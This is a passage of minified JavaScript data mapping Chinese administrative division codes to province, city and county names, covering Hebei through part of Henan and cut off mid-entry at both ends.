孟村回族自治县",130981:"泊头市",130982:"任丘市",130983:"黄骅市",130984:"河间市",130985:"其它区",131e3:"廊坊市",131002:"安次区",131003:"广阳区",131022:"固安县",131023:"永清县",131024:"香河县",131025:"大城县",131026:"文安县",131028:"大厂回族自治县",131081:"霸州市",131082:"三河市",131083:"其它区",131100:"衡水市",131102:"桃城区",131121:"枣强县",131122:"武邑县",131123:"武强县",131124:"饶阳县",131125:"安平县",131126:"故城县",131127:"景县",131128:"阜城县",131181:"冀州市",131182:"深州市",131183:"其它区",14e4:"山西省",140100:"太原市",140105:"小店区",140106:"迎泽区",140107:"杏花岭区",140108:"尖草坪区",140109:"万柏林区",140110:"晋源区",140121:"清徐县",140122:"阳曲县",140123:"娄烦县",140181:"古交市",140182:"其它区",140200:"大同市",140202:"城区",140203:"矿区",140211:"南郊区",140212:"新荣区",140221:"阳高县",140222:"天镇县",140223:"广灵县",140224:"灵丘县",140225:"浑源县",140226:"左云县",140227:"大同县",140228:"其它区",140300:"阳泉市",140302:"城区",140303:"矿区",140311:"郊区",140321:"平定县",140322:"盂县",140323:"其它区",140400:"长治市",140421:"长治县",140423:"襄垣县",140424:"屯留县",140425:"平顺县",140426:"黎城县",140427:"壶关县",140428:"长子县",140429:"武乡县",140430:"沁县",140431:"沁源县",140481:"潞城市",140482:"城区",140483:"郊区",140485:"其它区",140500:"晋城市",140502:"城区",140521:"沁水县",140522:"阳城县",140524:"陵川县",140525:"泽州县",140581:"高平市",140582:"其它区",140600:"朔州市",140602:"朔城区",140603:"平鲁区",140621:"山阴县",140622:"应县",140623:"右玉县",140624:"怀仁县",140625:"其它区",140700:"晋中市",140702:"榆次区",140721:"榆社县",140722:"左权县",140723:"和顺县",140724:"昔阳县",140725:"寿阳县",140726:"太谷县",140727:"祁县",140728:"平遥县",140729:"灵石县",140781:"介休市",140782:"其它区",140800:"运城市",140802:"盐湖区",140821:"临猗县",140822:"万荣县",140823:"闻喜县",140824:"稷山县",140825:"新绛县",140826:"绛县",140827:"垣曲县",140828:"夏县",140829:"平陆县",140830:"芮城县",140881:"永济市",140882:"河津市",140883:"其它区",140900:"忻州市",140902:"忻府区",140921:"定襄县",140922:"五台县",140923:"代县",140924:"繁峙县",140925:"宁武县",140926:"静乐县",140927:"神池县",140928:"五寨县",140929:"岢岚县",140930:"河曲县",140931:"保德县",140932:"偏关县",140981:"原平市",140982:"其它区",141e3:"临汾市",141002:"尧都区",141021:"曲沃县",141022:"翼城县",141023:"襄汾县",141024:"洪洞县",141025:"古县",141026:"安泽县",141027:"浮山县",141028:"吉县",141029:"乡宁县",141030:"大宁县",141031:"隰县",141032:"永和县",141033:"蒲县",141034:"汾西县",141081:"侯马市",141082:"霍州市",141083:"其它区",141100:"吕梁市",141102:"离石区",141121:"文水县",141122:"交城县",141123:"兴县",141124:"临县",141125:"柳林县",141126:"石楼县",141127:"岚县",141128:"方山县",141129:"中阳县",141130:"交口县",141181:"孝义市",141182:"汾阳市",141183:"其它区",15e4:"内蒙古自治区",150100:"呼和浩特市",150102:"新城区",150103:"回民区",150104:"玉泉区",150105:"赛罕区",150121:"土默特左旗",150122:"托克托县",150123:"和林格尔县",150124:"清水河县",150125:"武川县",150126:"其它区",150200:"包头市",150202:"东河区",150203:"昆都仑区",150204:"青山区",150205:"石拐区",150206:"白云鄂博矿区",150207:"九原区",150221:"土默特右旗",150222:"固阳县",150223:"达尔罕茂明安联合旗",150224:"其它区",150300:"乌海市",150302:"海勃湾区",150303:"海南区",150304:"乌达区",150305:"其它区",150400:"赤峰市",150402:"红山区",150403:"元宝山区",150404:"松山区",150421:"阿鲁科尔沁旗",150422:"巴林左旗",150423:"巴林右旗",150424:"林西县",150425:"克什克腾旗",150426:"翁牛特旗",150428:"喀喇沁旗",150429:"宁城县",150430:"敖汉旗",150431:"其它区",150500:"通辽市",150502:"科尔沁区",150521:"科尔沁左翼中旗",150522:"科尔沁左翼后旗",150523:"开鲁县",150524:"库伦旗",150525:"奈曼旗",150526:"扎鲁特旗",150581:"霍林郭勒市",150582:"其它区",150600:"鄂尔多斯市",150602:"东胜区",150621:"达拉特旗",150622:"准格尔旗",150623:"鄂托克前旗",150624:"鄂托克旗",150625:"杭锦旗",150626:"乌审旗",150627:"伊金霍洛旗",150628:"其它区",150700:"呼伦贝尔市",150702:"海拉尔区",150703:"扎赉诺尔区",150721:"阿荣旗",150722:"莫力达瓦达斡尔族自治旗",150723:"鄂伦春自治旗",150724:"鄂温克族自治旗",150725:"陈巴尔虎旗",150726:"新巴尔虎左旗",150727:"新巴尔虎右旗",150781:"满洲里市",150782:"牙克石市",150783:"扎兰屯市",150784:"额尔古纳市",150785:"根河市",150786:"其它区",150800:"巴彦淖尔市",150802:"临河区",150821:"五原县",150822:"磴口县",150823:"乌拉特前旗",150824:"乌拉特中旗",150825:"乌拉特后旗",150826:"杭锦后旗",150827:"其它区",150900:"乌兰察布市",150902:"集宁区",150921:"卓资县",150922:"化德县",150923:"商都县",150924:"兴和县",150925:"凉城县",150926:"察哈尔右翼前旗",150927:"察哈尔右翼中旗",150928:"察哈尔右翼后旗",150929:"四子王旗",150981:"丰镇市",150982:"其它区",152200:"兴安盟",152201:"乌兰浩特市",152202:"阿尔山市",152221:"科尔沁右翼前旗",152222:"科尔沁右翼中旗",152223:"扎赉特旗",152224:"突泉县",152225:"其它区",152500:"锡林郭勒盟",152501:"二连浩特市",152502:"锡林浩特市",152522:"阿巴嘎旗",152523:"苏尼特左旗",152524:"苏尼特右旗",152525:"东乌珠穆沁旗",152526:"西乌珠穆沁旗",152527:"太仆寺旗",152528:"镶黄旗",152529:"正镶白旗",152530:"正蓝旗",152531:"多伦县",152532:"其它区",152900:"阿拉善盟",152921:"阿拉善左旗",152922:"阿拉善右旗",152923:"额济纳旗",152924:"其它区",21e4:"辽宁省",210100:"沈阳市",210102:"和平区",210103:"沈河区",210104:"大东区",210105:"皇姑区",210106:"铁西区",210111:"苏家屯区",210112:"东陵区",210113:"新城子区",210114:"于洪区",210122:"辽中县",210123:"康平县",210124:"法库县",210181:"新民市",210184:"沈北新区",210185:"其它区",210200:"大连市",210202:"中山区",210203:"西岗区",210204:"沙河口区",210211:"甘井子区",210212:"旅顺口区",210213:"金州区",210224:"长海县",210281:"瓦房店市",210282:"普兰店市",210283:"庄河市",210298:"其它区",210300:"鞍山市",210302:"铁东区",210303:"铁西区",210304:"立山区",210311:"千山区",210321:"台安县",210323:"岫岩满族自治县",210381:"海城市",210382:"其它区",210400:"抚顺市",210402:"新抚区",210403:"东洲区",210404:"望花区",210411:"顺城区",210421:"抚顺县",210422:"新宾满族自治县",210423:"清原满族自治县",210424:"其它区",210500:"本溪市",210502:"平山区",210503:"溪湖区",210504:"明山区",210505:"南芬区",210521:"本溪满族自治县",210522:"桓仁满族自治县",210523:"其它区",210600:"丹东市",210602:"元宝区",210603:"振兴区",210604:"振安区",210624:"宽甸满族自治县",210681:"东港市",210682:"凤城市",210683:"其它区",210700:"锦州市",210702:"古塔区",210703:"凌河区",210711:"太和区",210726:"黑山县",210727:"义县",210781:"凌海市",210782:"北镇市",210783:"其它区",210800:"营口市",210802:"站前区",210803:"西市区",210804:"鲅鱼圈区",210811:"老边区",210881:"盖州市",210882:"大石桥市",210883:"其它区",210900:"阜新市",210902:"海州区",210903:"新邱区",210904:"太平区",210905:"清河门区",210911:"细河区",210921:"阜新蒙古族自治县",210922:"彰武县",210923:"其它区",211e3:"辽阳市",211002:"白塔区",211003:"文圣区",211004:"宏伟区",211005:"弓长岭区",211011:"太子河区",211021:"辽阳县",211081:"灯塔市",211082:"其它区",211100:"盘锦市",211102:"双台子区",211103:"兴隆台区",211121:"大洼县",211122:"盘山县",211123:"其它区",211200:"铁岭市",211202:"银州区",211204:"清河区",211221:"铁岭县",211223:"西丰县",211224:"昌图县",211281:"调兵山市",211282:"开原市",211283:"其它区",211300:"朝阳市",211302:"双塔区",211303:"龙城区",211321:"朝阳县",211322:"建平县",211324:"喀喇沁左翼蒙古族自治县",211381:"北票市",211382:"凌源市",211383:"其它区",211400:"葫芦岛市",211402:"连山区",211403:"龙港区",211404:"南票区",211421:"绥中县",211422:"建昌县",211481:"兴城市",211482:"其它区",22e4:"吉林省",220100:"长春市",220102:"南关区",220103:"宽城区",220104:"朝阳区",220105:"二道区",220106:"绿园区",220112:"双阳区",220122:"农安县",220181:"九台市",220182:"榆树市",220183:"德惠市",220188:"其它区",220200:"吉林市",220202:"昌邑区",220203:"龙潭区",220204:"船营区",220211:"丰满区",220221:"永吉县",220281:"蛟河市",220282:"桦甸市",220283:"舒兰市",220284:"磐石市",220285:"其它区",220300:"四平市",220302:"铁西区",220303:"铁东区",220322:"梨树县",220323:"伊通满族自治县",220381:"公主岭市",220382:"双辽市",220383:"其它区",220400:"辽源市",220402:"龙山区",220403:"西安区",220421:"东丰县",220422:"东辽县",220423:"其它区",220500:"通化市",220502:"东昌区",220503:"二道江区",220521:"通化县",220523:"辉南县",220524:"柳河县",220581:"梅河口市",220582:"集安市",220583:"其它区",220600:"白山市",220602:"浑江区",220621:"抚松县",220622:"靖宇县",220623:"长白朝鲜族自治县",220625:"江源区",220681:"临江市",220682:"其它区",220700:"松原市",220702:"宁江区",220721:"前郭尔罗斯蒙古族自治县",220722:"长岭县",220723:"乾安县",220724:"扶余市",220725:"其它区",220800:"白城市",220802:"洮北区",220821:"镇赉县",220822:"通榆县",220881:"洮南市",220882:"大安市",220883:"其它区",222400:"延边朝鲜族自治州",222401:"延吉市",222402:"图们市",222403:"敦化市",222404:"珲春市",222405:"龙井市",222406:"和龙市",222424:"汪清县",222426:"安图县",222427:"其它区",23e4:"黑龙江省",230100:"哈尔滨市",230102:"道里区",230103:"南岗区",230104:"道外区",230106:"香坊区",230108:"平房区",230109:"松北区",230111:"呼兰区",230123:"依兰县",230124:"方正县",230125:"宾县",230126:"巴彦县",230127:"木兰县",230128:"通河县",230129:"延寿县",230181:"阿城区",230182:"双城市",230183:"尚志市",230184:"五常市",230186:"其它区",230200:"齐齐哈尔市",230202:"龙沙区",230203:"建华区",230204:"铁锋区",230205:"昂昂溪区",230206:"富拉尔基区",230207:"碾子山区",230208:"梅里斯达斡尔族区",230221:"龙江县",230223:"依安县",230224:"泰来县",230225:"甘南县",230227:"富裕县",230229:"克山县",230230:"克东县",230231:"拜泉县",230281:"讷河市",230282:"其它区",230300:"鸡西市",230302:"鸡冠区",230303:"恒山区",230304:"滴道区",230305:"梨树区",230306:"城子河区",230307:"麻山区",230321:"鸡东县",230381:"虎林市",230382:"密山市",230383:"其它区",230400:"鹤岗市",230402:"向阳区",230403:"工农区",230404:"南山区",230405:"兴安区",230406:"东山区",230407:"兴山区",230421:"萝北县",230422:"绥滨县",230423:"其它区",230500:"双鸭山市",230502:"尖山区",230503:"岭东区",230505:"四方台区",230506:"宝山区",230521:"集贤县",230522:"友谊县",230523:"宝清县",230524:"饶河县",230525:"其它区",230600:"大庆市",230602:"萨尔图区",230603:"龙凤区",230604:"让胡路区",230605:"红岗区",230606:"大同区",230621:"肇州县",230622:"肇源县",230623:"林甸县",230624:"杜尔伯特蒙古族自治县",230625:"其它区",230700:"伊春市",230702:"伊春区",230703:"南岔区",230704:"友好区",230705:"西林区",230706:"翠峦区",230707:"新青区",230708:"美溪区",230709:"金山屯区",230710:"五营区",230711:"乌马河区",230712:"汤旺河区",230713:"带岭区",230714:"乌伊岭区",230715:"红星区",230716:"上甘岭区",230722:"嘉荫县",230781:"铁力市",230782:"其它区",230800:"佳木斯市",230803:"向阳区",230804:"前进区",230805:"东风区",230811:"郊区",230822:"桦南县",230826:"桦川县",230828:"汤原县",230833:"抚远县",230881:"同江市",230882:"富锦市",230883:"其它区",230900:"七台河市",230902:"新兴区",230903:"桃山区",230904:"茄子河区",230921:"勃利县",230922:"其它区",231e3:"牡丹江市",231002:"东安区",231003:"阳明区",231004:"爱民区",231005:"西安区",231024:"东宁县",231025:"林口县",231081:"绥芬河市",231083:"海林市",231084:"宁安市",231085:"穆棱市",231086:"其它区",231100:"黑河市",231102:"爱辉区",231121:"嫩江县",231123:"逊克县",231124:"孙吴县",231181:"北安市",231182:"五大连池市",231183:"其它区",231200:"绥化市",231202:"北林区",231221:"望奎县",231222:"兰西县",231223:"青冈县",231224:"庆安县",231225:"明水县",231226:"绥棱县",231281:"安达市",231282:"肇东市",231283:"海伦市",231284:"其它区",232700:"大兴安岭地区",232702:"松岭区",232703:"新林区",232704:"呼中区",232721:"呼玛县",232722:"塔河县",232723:"漠河县",232724:"加格达奇区",232725:"其它区",31e4:"上海",310100:"上海市",310101:"黄浦区",310104:"徐汇区",310105:"长宁区",310106:"静安区",310107:"普陀区",310108:"闸北区",310109:"虹口区",310110:"杨浦区",310112:"闵行区",310113:"宝山区",310114:"嘉定区",310115:"浦东新区",310116:"金山区",310117:"松江区",310118:"青浦区",310120:"奉贤区",310230:"崇明县",310231:"其它区",32e4:"江苏省",320100:"南京市",320102:"玄武区",320104:"秦淮区",320105:"建邺区",320106:"鼓楼区",320111:"浦口区",320113:"栖霞区",320114:"雨花台区",320115:"江宁区",320116:"六合区",320124:"溧水区",320125:"高淳区",320126:"其它区",320200:"无锡市",320202:"崇安区",320203:"南长区",320204:"北塘区",320205:"锡山区",320206:"惠山区",320211:"滨湖区",320281:"江阴市",320282:"宜兴市",320297:"其它区",320300:"徐州市",320302:"鼓楼区",320303:"云龙区",320305:"贾汪区",320311:"泉山区",320321:"丰县",320322:"沛县",320323:"铜山区",320324:"睢宁县",320381:"新沂市",320382:"邳州市",320383:"其它区",320400:"常州市",320402:"天宁区",320404:"钟楼区",320405:"戚墅堰区",320411:"新北区",320412:"武进区",320481:"溧阳市",320482:"金坛市",320483:"其它区",320500:"苏州市",320505:"虎丘区",320506:"吴中区",320507:"相城区",320508:"姑苏区",320581:"常熟市",320582:"张家港市",320583:"昆山市",320584:"吴江区",320585:"太仓市",320596:"其它区",320600:"南通市",320602:"崇川区",320611:"港闸区",320612:"通州区",320621:"海安县",320623:"如东县",320681:"启东市",320682:"如皋市",320684:"海门市",320694:"其它区",320700:"连云港市",320703:"连云区",320705:"新浦区",320706:"海州区",320721:"赣榆县",320722:"东海县",320723:"灌云县",320724:"灌南县",320725:"其它区",320800:"淮安市",320802:"清河区",320803:"淮安区",320804:"淮阴区",320811:"清浦区",320826:"涟水县",320829:"洪泽县",320830:"盱眙县",320831:"金湖县",320832:"其它区",320900:"盐城市",320902:"亭湖区",320903:"盐都区",320921:"响水县",320922:"滨海县",320923:"阜宁县",320924:"射阳县",320925:"建湖县",320981:"东台市",320982:"大丰市",320983:"其它区",321e3:"扬州市",321002:"广陵区",321003:"邗江区",321023:"宝应县",321081:"仪征市",321084:"高邮市",321088:"江都区",321093:"其它区",321100:"镇江市",321102:"京口区",321111:"润州区",321112:"丹徒区",321181:"丹阳市",321182:"扬中市",321183:"句容市",321184:"其它区",321200:"泰州市",321202:"海陵区",321203:"高港区",321281:"兴化市",321282:"靖江市",321283:"泰兴市",321284:"姜堰区",321285:"其它区",321300:"宿迁市",321302:"宿城区",321311:"宿豫区",321322:"沭阳县",321323:"泗阳县",321324:"泗洪县",321325:"其它区",33e4:"浙江省",330100:"杭州市",330102:"上城区",330103:"下城区",330104:"江干区",330105:"拱墅区",330106:"西湖区",330108:"滨江区",330109:"萧山区",330110:"余杭区",330122:"桐庐县",330127:"淳安县",330182:"建德市",330183:"富阳市",330185:"临安市",330186:"其它区",330200:"宁波市",330203:"海曙区",330204:"江东区",330205:"江北区",330206:"北仑区",330211:"镇海区",330212:"鄞州区",330225:"象山县",330226:"宁海县",330281:"余姚市",330282:"慈溪市",330283:"奉化市",330284:"其它区",330300:"温州市",330302:"鹿城区",330303:"龙湾区",330304:"瓯海区",330322:"洞头县",330324:"永嘉县",330326:"平阳县",330327:"苍南县",330328:"文成县",330329:"泰顺县",330381:"瑞安市",330382:"乐清市",330383:"其它区",330400:"嘉兴市",330402:"南湖区",330411:"秀洲区",330421:"嘉善县",330424:"海盐县",330481:"海宁市",330482:"平湖市",330483:"桐乡市",330484:"其它区",330500:"湖州市",330502:"吴兴区",330503:"南浔区",330521:"德清县",330522:"长兴县",330523:"安吉县",330524:"其它区",330600:"绍兴市",330602:"越城区",330621:"绍兴县",330624:"新昌县",330681:"诸暨市",330682:"上虞市",330683:"嵊州市",330684:"其它区",330700:"金华市",330702:"婺城区",330703:"金东区",330723:"武义县",330726:"浦江县",330727:"磐安县",330781:"兰溪市",330782:"义乌市",330783:"东阳市",330784:"永康市",330785:"其它区",330800:"衢州市",330802:"柯城区",330803:"衢江区",330822:"常山县",330824:"开化县",330825:"龙游县",330881:"江山市",330882:"其它区",330900:"舟山市",330902:"定海区",330903:"普陀区",330921:"岱山县",330922:"嵊泗县",330923:"其它区",331e3:"台州市",331002:"椒江区",331003:"黄岩区",331004:"路桥区",331021:"玉环县",331022:"三门县",331023:"天台县",331024:"仙居县",331081:"温岭市",331082:"临海市",331083:"其它区",331100:"丽水市",331102:"莲都区",331121:"青田县",331122:"缙云县",331123:"遂昌县",331124:"松阳县",331125:"云和县",331126:"庆元县",331127:"景宁畲族自治县",331181:"龙泉市",331182:"其它区",34e4:"安徽省",340100:"合肥市",340102:"瑶海区",340103:"庐阳区",340104:"蜀山区",340111:"包河区",340121:"长丰县",340122:"肥东县",340123:"肥西县",340192:"其它区",340200:"芜湖市",340202:"镜湖区",340203:"弋江区",340207:"鸠江区",340208:"三山区",340221:"芜湖县",340222:"繁昌县",340223:"南陵县",340224:"其它区",340300:"蚌埠市",340302:"龙子湖区",340303:"蚌山区",340304:"禹会区",340311:"淮上区",340321:"怀远县",340322:"五河县",340323:"固镇县",340324:"其它区",340400:"淮南市",340402:"大通区",340403:"田家庵区",340404:"谢家集区",340405:"八公山区",340406:"潘集区",340421:"凤台县",340422:"其它区",340500:"马鞍山市",340503:"花山区",340504:"雨山区",340506:"博望区",340521:"当涂县",340522:"其它区",340600:"淮北市",340602:"杜集区",340603:"相山区",340604:"烈山区",340621:"濉溪县",340622:"其它区",340700:"铜陵市",340702:"铜官山区",340703:"狮子山区",340711:"郊区",340721:"铜陵县",340722:"其它区",340800:"安庆市",340802:"迎江区",340803:"大观区",340811:"宜秀区",340822:"怀宁县",340823:"枞阳县",340824:"潜山县",340825:"太湖县",340826:"宿松县",340827:"望江县",340828:"岳西县",340881:"桐城市",340882:"其它区",341e3:"黄山市",341002:"屯溪区",341003:"黄山区",341004:"徽州区",341021:"歙县",341022:"休宁县",341023:"黟县",341024:"祁门县",341025:"其它区",341100:"滁州市",341102:"琅琊区",341103:"南谯区",341122:"来安县",341124:"全椒县",341125:"定远县",341126:"凤阳县",341181:"天长市",341182:"明光市",341183:"其它区",341200:"阜阳市",341202:"颍州区",341203:"颍东区",341204:"颍泉区",341221:"临泉县",341222:"太和县",341225:"阜南县",341226:"颍上县",341282:"界首市",341283:"其它区",341300:"宿州市",341302:"埇桥区",341321:"砀山县",341322:"萧县",341323:"灵璧县",341324:"泗县",341325:"其它区",341400:"巢湖市",341421:"庐江县",341422:"无为县",341423:"含山县",341424:"和县",341500:"六安市",341502:"金安区",341503:"裕安区",341521:"寿县",341522:"霍邱县",341523:"舒城县",341524:"金寨县",341525:"霍山县",341526:"其它区",341600:"亳州市",341602:"谯城区",341621:"涡阳县",341622:"蒙城县",341623:"利辛县",341624:"其它区",341700:"池州市",341702:"贵池区",341721:"东至县",341722:"石台县",341723:"青阳县",341724:"其它区",341800:"宣城市",341802:"宣州区",341821:"郎溪县",341822:"广德县",341823:"泾县",341824:"绩溪县",341825:"旌德县",341881:"宁国市",341882:"其它区",35e4:"福建省",350100:"福州市",350102:"鼓楼区",350103:"台江区",350104:"仓山区",350105:"马尾区",350111:"晋安区",350121:"闽侯县",350122:"连江县",350123:"罗源县",350124:"闽清县",350125:"永泰县",350128:"平潭县",350181:"福清市",350182:"长乐市",350183:"其它区",350200:"厦门市",350203:"思明区",350205:"海沧区",350206:"湖里区",350211:"集美区",350212:"同安区",350213:"翔安区",350214:"其它区",350300:"莆田市",350302:"城厢区",350303:"涵江区",350304:"荔城区",350305:"秀屿区",350322:"仙游县",350323:"其它区",350400:"三明市",350402:"梅列区",350403:"三元区",350421:"明溪县",350423:"清流县",350424:"宁化县",350425:"大田县",350426:"尤溪县",350427:"沙县",350428:"将乐县",350429:"泰宁县",350430:"建宁县",350481:"永安市",350482:"其它区",350500:"泉州市",350502:"鲤城区",350503:"丰泽区",350504:"洛江区",350505:"泉港区",350521:"惠安县",350524:"安溪县",350525:"永春县",350526:"德化县",350527:"金门县",350581:"石狮市",350582:"晋江市",350583:"南安市",350584:"其它区",350600:"漳州市",350602:"芗城区",350603:"龙文区",350622:"云霄县",350623:"漳浦县",350624:"诏安县",350625:"长泰县",350626:"东山县",350627:"南靖县",350628:"平和县",350629:"华安县",350681:"龙海市",350682:"其它区",350700:"南平市",350702:"延平区",350721:"顺昌县",350722:"浦城县",350723:"光泽县",350724:"松溪县",350725:"政和县",350781:"邵武市",350782:"武夷山市",350783:"建瓯市",350784:"建阳市",350785:"其它区",350800:"龙岩市",350802:"新罗区",350821:"长汀县",350822:"永定县",350823:"上杭县",350824:"武平县",350825:"连城县",350881:"漳平市",350882:"其它区",350900:"宁德市",350902:"蕉城区",350921:"霞浦县",350922:"古田县",350923:"屏南县",350924:"寿宁县",350925:"周宁县",350926:"柘荣县",350981:"福安市",350982:"福鼎市",350983:"其它区",36e4:"江西省",360100:"南昌市",360102:"东湖区",360103:"西湖区",360104:"青云谱区",360105:"湾里区",360111:"青山湖区",360121:"南昌县",360122:"新建县",360123:"安义县",360124:"进贤县",360128:"其它区",360200:"景德镇市",360202:"昌江区",360203:"珠山区",360222:"浮梁县",360281:"乐平市",360282:"其它区",360300:"萍乡市",360302:"安源区",360313:"湘东区",360321:"莲花县",360322:"上栗县",360323:"芦溪县",360324:"其它区",360400:"九江市",360402:"庐山区",360403:"浔阳区",360421:"九江县",360423:"武宁县",360424:"修水县",360425:"永修县",360426:"德安县",360427:"星子县",360428:"都昌县",360429:"湖口县",360430:"彭泽县",360481:"瑞昌市",360482:"其它区",360483:"共青城市",360500:"新余市",360502:"渝水区",360521:"分宜县",360522:"其它区",360600:"鹰潭市",360602:"月湖区",360622:"余江县",360681:"贵溪市",360682:"其它区",360700:"赣州市",360702:"章贡区",360721:"赣县",360722:"信丰县",360723:"大余县",360724:"上犹县",360725:"崇义县",360726:"安远县",360727:"龙南县",360728:"定南县",360729:"全南县",360730:"宁都县",360731:"于都县",360732:"兴国县",360733:"会昌县",360734:"寻乌县",360735:"石城县",360781:"瑞金市",360782:"南康市",360783:"其它区",360800:"吉安市",360802:"吉州区",360803:"青原区",360821:"吉安县",360822:"吉水县",360823:"峡江县",360824:"新干县",360825:"永丰县",360826:"泰和县",360827:"遂川县",360828:"万安县",360829:"安福县",360830:"永新县",360881:"井冈山市",360882:"其它区",360900:"宜春市",360902:"袁州区",360921:"奉新县",360922:"万载县",360923:"上高县",360924:"宜丰县",360925:"靖安县",360926:"铜鼓县",360981:"丰城市",360982:"樟树市",360983:"高安市",360984:"其它区",361e3:"抚州市",361002:"临川区",361021:"南城县",361022:"黎川县",361023:"南丰县",361024:"崇仁县",361025:"乐安县",361026:"宜黄县",361027:"金溪县",361028:"资溪县",361029:"东乡县",361030:"广昌县",361031:"其它区",361100:"上饶市",361102:"信州区",361121:"上饶县",361122:"广丰县",361123:"玉山县",361124:"铅山县",361125:"横峰县",361126:"弋阳县",361127:"余干县",361128:"鄱阳县",361129:"万年县",361130:"婺源县",361181:"德兴市",361182:"其它区",37e4:"山东省",370100:"济南市",370102:"历下区",370103:"市中区",370104:"槐荫区",370105:"天桥区",370112:"历城区",370113:"长清区",370124:"平阴县",370125:"济阳县",370126:"商河县",370181:"章丘市",370182:"其它区",370200:"青岛市",370202:"市南区",370203:"市北区",370211:"黄岛区",370212:"崂山区",370213:"李沧区",370214:"城阳区",370281:"胶州市",370282:"即墨市",370283:"平度市",370285:"莱西市",370286:"其它区",370300:"淄博市",370302:"淄川区",370303:"张店区",370304:"博山区",370305:"临淄区",370306:"周村区",370321:"桓台县",370322:"高青县",370323:"沂源县",370324:"其它区",370400:"枣庄市",370402:"市中区",370403:"薛城区",370404:"峄城区",370405:"台儿庄区",370406:"山亭区",370481:"滕州市",370482:"其它区",370500:"东营市",370502:"东营区",370503:"河口区",370521:"垦利县",370522:"利津县",370523:"广饶县",370591:"其它区",370600:"烟台市",370602:"芝罘区",370611:"福山区",370612:"牟平区",370613:"莱山区",370634:"长岛县",370681:"龙口市",370682:"莱阳市",370683:"莱州市",370684:"蓬莱市",370685:"招远市",370686:"栖霞市",370687:"海阳市",370688:"其它区",370700:"潍坊市",370702:"潍城区",370703:"寒亭区",370704:"坊子区",370705:"奎文区",370724:"临朐县",370725:"昌乐县",370781:"青州市",370782:"诸城市",370783:"寿光市",370784:"安丘市",370785:"高密市",370786:"昌邑市",370787:"其它区",370800:"济宁市",370802:"市中区",370811:"任城区",370826:"微山县",370827:"鱼台县",370828:"金乡县",370829:"嘉祥县",370830:"汶上县",370831:"泗水县",370832:"梁山县",370881:"曲阜市",370882:"兖州市",370883:"邹城市",370884:"其它区",370900:"泰安市",370902:"泰山区",370903:"岱岳区",370921:"宁阳县",370923:"东平县",370982:"新泰市",370983:"肥城市",370984:"其它区",371e3:"威海市",371002:"环翠区",371081:"文登市",371082:"荣成市",371083:"乳山市",371084:"其它区",371100:"日照市",371102:"东港区",371103:"岚山区",371121:"五莲县",371122:"莒县",371123:"其它区",371200:"莱芜市",371202:"莱城区",371203:"钢城区",371204:"其它区",371300:"临沂市",371302:"兰山区",371311:"罗庄区",371312:"河东区",371321:"沂南县",371322:"郯城县",371323:"沂水县",371324:"苍山县",371325:"费县",371326:"平邑县",371327:"莒南县",371328:"蒙阴县",371329:"临沭县",371330:"其它区",371400:"德州市",371402:"德城区",371421:"陵县",371422:"宁津县",371423:"庆云县",371424:"临邑县",371425:"齐河县",371426:"平原县",371427:"夏津县",371428:"武城县",371481:"乐陵市",371482:"禹城市",371483:"其它区",371500:"聊城市",371502:"东昌府区",371521:"阳谷县",371522:"莘县",371523:"茌平县",371524:"东阿县",371525:"冠县",371526:"高唐县",371581:"临清市",371582:"其它区",371600:"滨州市",371602:"滨城区",371621:"惠民县",371622:"阳信县",371623:"无棣县",371624:"沾化县",371625:"博兴县",371626:"邹平县",371627:"其它区",371700:"菏泽市",371702:"牡丹区",371721:"曹县",371722:"单县",371723:"成武县",371724:"巨野县",371725:"郓城县",371726:"鄄城县",371727:"定陶县",371728:"东明县",371729:"其它区",41e4:"河南省",410100:"郑州市",410102:"中原区",410103:"二七区",410104:"管城回族区",410105:"金水区",410106:"上街区",410108:"惠济区",410122:"中牟县",410181:"巩义市",410182:"荥阳市",410183:"新密市",410184:"新郑市",410185:"登封市",410188:"其它区",410200:"开封市",410202:"龙亭区",410203:"顺河回族区",410204:"鼓楼区",410205:"禹王台区",410211:"金明区",410221:"杞县",410222:"通许县",410223:"尉氏县",410224:"开封县",410225:"兰考县",410226:"其它区",410300:"洛阳市",410302:"老城区",410303:"西工区",410304:"瀍河回族区",410305:"涧西区",410306:"吉利区",410307:"洛龙区",410322:"孟津县",410323:"新安县",410324:"栾川县",410325:"嵩县",410326:"汝阳县",410327:"宜阳县",410328:"洛宁县",410329:"伊川县",410381:"偃师市",410400:"平顶山市",410402:"新华区",410403:"卫东区",410404:"石龙区",410411:"湛河区",410421:"宝丰县",410422:"叶县",410423:"鲁山县",410425:"郏县",410481:"舞钢市",410482:"汝州市",410483:"其它区",410500:"安阳市",410502:"文峰区",410503:"北关区",410505:"殷都区",410506:"龙安区",410522:"安阳县",410523:"汤阴县",410526:"滑县",410527:"内黄县",410581:"林州市",410582:"其它区",410600:"鹤壁市",410602:"鹤山区",410603:"山城区",410611:"淇滨区",410621:"浚县",410622:"淇县",410623:"其它区",410700:"新乡市",410702:"红旗区",410703:"卫滨区",410704:"凤泉区",410711:"牧野区",410721:"新乡县",410724:"获嘉县",410725:"原阳县",410726:"延津县",410727:"封丘县",410728:"长垣县",410781:"卫辉市",410782:"辉县市",410783:"其它区",410800:"焦作市",410802:"解放区",410803:"中站区",410804:"马村区",410811:"山阳区",410821:"修武县",410822:"博爱县",410823:"武陟县",410825:"温县",410881:"济源市",410882:"沁阳市",410883:"孟州市",410884:"其它区",410900:"濮阳市",410902:"华龙区",410922:"清丰县",410923:"南乐县",410926:"范县",410927:"台前县",410928:"濮阳县",410929:"其它区",411e3:"许昌市",411002:"魏都区",411023:"许昌县",411024:"鄢陵县",411025:"襄城县",411081:"禹州市",411082:"长葛市",411083:"其它区",411100:"漯河市",411102:"源汇区",411103:"郾城区",411104:"召陵区",411121:"舞阳县",411122:"临颍县",411123:"其它区",411200:"三门峡市",411202:"湖滨区",411221:"渑池县",411222:"陕县",411224:"卢氏县",411281:"义马市",411282:"灵宝市",411283:"其它区",411300:"南阳市",411302:"宛城区",411303:"卧龙区",411321:"南召县",411322:"方城县",411323:"西峡县",411324:"镇平县",411325:"内乡县",411326:"淅川县",411327:"社旗县",411328:"唐河县",411329:"新野县",411330:"桐柏县",411381:"邓州市",411382:"其它区",411400:"商丘市",411402:"梁园区",411403:"睢阳区",411421:"民权县",411422:"睢县",411423:"宁陵县",411424:"柘城县",411425:"虞城县",411426:"夏邑县",411481:"永城市",411482:"其它区",411500:"信阳市",411502:"浉河区",411503:"平桥区",411521:"罗山县",411522:"光山县",411523:"新县",411524:"商城县",411525:"固始县",411526:"潢川县",411527:"淮滨县",411528:"息县",411529:"其它区",411600:"周口市",411602:"川汇区",411621:"扶沟县",411622:"西华县",411623:"商水县",411624:"沈丘县",411625:"郸城县",411626: